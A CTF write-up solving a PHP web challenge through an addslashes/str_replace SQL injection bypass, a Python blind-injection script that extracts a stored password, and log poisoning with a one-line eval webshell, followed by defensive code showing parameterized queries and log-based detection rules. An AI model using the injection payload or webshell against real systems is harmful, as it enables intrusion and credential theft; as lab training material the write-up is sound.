It has been far too long since I played a CTF; I got crushed at Yangcheng Cup (羊城杯), so it is time to start rehab.

On to the challenge.

The page opens on a login form. I entered arbitrary credentials and captured the request, which revealed user.php, but there were no further leads. A directory scan found robots.txt; following it showed that backup files could be downloaded, although the backup of index.php was not available. Continuing to look for clues with F12 (browser dev tools), the images turned out to be served through image.php; downloading its backup succeeded.

image.php:

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);
?>

Judging from the source, this is SQL injection. Both id and path are passed through addslashes(), which prefixes single quotes, double quotes, backslashes and NUL bytes with a backslash; afterwards id and path are filtered again with str_replace(). Because the stripping happens after the escaping, it can remove parts of the escape sequences addslashes() just produced, which yields the bypass ?id=\0'&path=or 1=1%23. After addslashes(), id becomes \\0\'; the filter first removes \0 and then \', leaving a lone \, so the query becomes select * from images where id='\' or path='or 1=1#' and the injection works. Next, run the blind injection script:

import requests

url = 'http://e4bad4d9-a501-4046-9b3d-ea44d661d6d5.node3.buuoj.cn/image.php'
flag = ''
for i in range(1, 300):
    print(i)
    # Binary search over printable ASCII for the i-th character of the password
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # Boolean oracle: a JPEG (containing "JFIF") comes back only when the comparison is true
        payload = "?id=\\0'&path=or ascii(substr((select password from users),{},1))>{}%23".format(i, mid)
        r = requests.get(url=url + payload)
        if "JFIF" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # Reaching the search bounds means there is no further character
    if mid == 32 or mid == 127:
        break
    flag += chr(mid)
    print(flag)

(The string JFIF was observed when capturing image.php's response; it is the marker the script uses as its true/false oracle.)
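To make the escape-then-strip bug above concrete, here is an added example (my own code, not part of the original writeup or the challenge) that reproduces PHP's addslashes() and the str_replace() needle list from image.php in Python, shows what the payload turns into, and contrasts the string-concatenated query with a parameterized lookup. The SQLite in-memory table and its two rows are constructed stand-ins for the challenge's MySQL images table.

```python
import sqlite3


def php_addslashes(value: str) -> str:
    """Reproduce PHP's addslashes(): prefix ', ", \\ and NUL with a backslash."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


# The challenge's needle list, applied like PHP's str_replace(array(...), "", $s):
# every needle is removed in turn, each pass running over the whole current string.
FILTER_NEEDLES = ("\\0", "%00", "\\'", "'")


def challenge_filter(value: str) -> str:
    """addslashes() first, then strip the needles, in the same order as image.php."""
    escaped = php_addslashes(value)
    for needle in FILTER_NEEDLES:
        escaped = escaped.replace(needle, "")
    return escaped


def build_vulnerable_query(id_: str, path: str) -> str:
    """The string-concatenated query from image.php (the vulnerable form)."""
    return "select * from images where id='{}' or path='{}'".format(
        challenge_filter(id_), challenge_filter(path)
    )


def lookup_images_parameterized(id_: str, path: str) -> list:
    """Hardened form: bound parameters, so user input is never parsed as SQL.

    Uses an in-memory SQLite table with constructed rows standing in for the
    challenge's MySQL `images` table.
    """
    con = sqlite3.connect(":memory:")
    con.execute("create table images (id text, path text)")
    con.executemany(
        "insert into images values (?, ?)",
        [("1", "1.jpg"), ("2", "2.jpg")],  # constructed sample rows
    )
    rows = con.execute(
        "select path from images where id = ? or path = ?", (id_, path)
    ).fetchall()
    con.close()
    return [row[0] for row in rows]


if __name__ == "__main__":
    # The writeup's payload, after the web server has URL-decoded %23 to '#'.
    injected_id, injected_path = "\\0'", "or 1=1#"
    print(repr(challenge_filter(injected_id)))  # '\\' : only the lone backslash survives
    print(build_vulnerable_query(injected_id, injected_path))
    print(lookup_images_parameterized(injected_id, injected_path))  # []
    print(lookup_images_parameterized("1", ""))  # ['1.jpg']
```

The point the two functions make side by side: the same two inputs collapse the concatenated query into id='\' or path='or 1=1#', while the parameterized query simply compares them as literals and returns no rows.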

With the username and password recovered, log in; you get a file upload form. Whatever is uploaded gets written into a log, so set filename to a one-line webshell. <?php is blocked, so use the short echo tag instead: <?=@eval($_POST['k']);?>. Connect with AntSword (蚁剑); the flag is in the root directory.
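From the defender's side, both steps of this writeup leave distinctive traces: the blind injection produces a burst of requests to image.php whose decoded query strings carry ascii(substr(...)), and the log poisoning puts a PHP open tag into a user-controlled log field. The following added example (my own code, not from the writeup or the challenge) parses constructed Apache-style access-log lines and a constructed application upload log and flags both. The log lines, IP addresses, timestamps and file names are all made up for the demonstration.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format) modelled on the
# requests the writeup's script would generate; not taken from any real server.
ACCESS_LOG = """\
10.0.0.5 - - [01/Sep/2020:10:00:01 +0800] "GET /image.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2020:10:00:02 +0800] "GET /image.php?id=%5C0'&path=or+ascii(substr((select+password+from+users),1,1))%3E79%23 HTTP/1.1" 200 5120 "-" "python-requests/2.24"
10.0.0.9 - - [01/Sep/2020:10:00:02 +0800] "GET /image.php?id=%5C0'&path=or+ascii(substr((select+password+from+users),1,1))%3E103%23 HTTP/1.1" 200 0 "-" "python-requests/2.24"
10.0.0.9 - - [01/Sep/2020:10:00:03 +0800] "GET /image.php?id=%5C0'&path=or+ascii(substr((select+password+from+users),1,1))%3E91%23 HTTP/1.1" 200 5120 "-" "python-requests/2.24"
10.0.0.5 - - [01/Sep/2020:10:06:00 +0800] "GET /image.php?id=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Constructed application upload log; the file name is user-controlled.
UPLOAD_LOG = """\
2020-09-01 10:05:00 upload ip=10.0.0.5 filename="holiday.jpg" size=20481
2020-09-01 10:05:07 upload ip=10.0.0.7 filename="<?=@eval($_POST['k']);?>" size=12
2020-09-01 10:05:30 upload ip=10.0.0.5 filename="notes.txt" size=300
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules are checked against the URL-decoded request target; first match wins.
SQLI_RULES = {
    "blind-substr": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "tautology": re.compile(r"\bor\s+1\s*=\s*1\b", re.I),
    "addslashes-bypass": re.compile(r"\\0'"),  # the \0' prefix used in this challenge
}
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)


def parse_access_line(line: str):
    """Split one combined-format line into fields, or return None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def find_sqli(log_text: str) -> list:
    """Return (ip, path, rule) for every request whose decoded target matches a rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_access_line(line)
        if not rec:
            continue
        decoded = unquote_plus(rec["target"])  # %5C -> \, %3E -> >, %23 -> #, + -> space
        path = decoded.split("?", 1)[0]
        for name, rx in SQLI_RULES.items():
            if rx.search(decoded):
                hits.append((rec["ip"], path, name))
                break
    return hits


def requests_per_ip(hits: list) -> Counter:
    """Count flagged requests per client; a blind injection shows up as a burst from one IP."""
    return Counter(ip for ip, _, _ in hits)


def find_php_tags(log_text: str) -> list:
    """Lines of a user-controlled log that contain a PHP open tag (log-poisoning attempts)."""
    return [line for line in log_text.splitlines() if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    hits = find_sqli(ACCESS_LOG)
    for ip, path, rule in hits:
        print(f"SQLi rule {rule} from {ip} against {path}")
    print(dict(requests_per_ip(hits)))  # {'10.0.0.9': 3}
    for line in find_php_tags(UPLOAD_LOG):
        print("PHP tag in upload log:", line)
```

Decoding the target before matching matters: the script's payload reaches the server percent-encoded, so a rule applied to the raw log line would miss ascii(substr( written as ascii%28substr%28. Keeping a `filename` out of any file the PHP interpreter can later include is the fix for the second finding; detecting the tag in the log is only the alarm.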
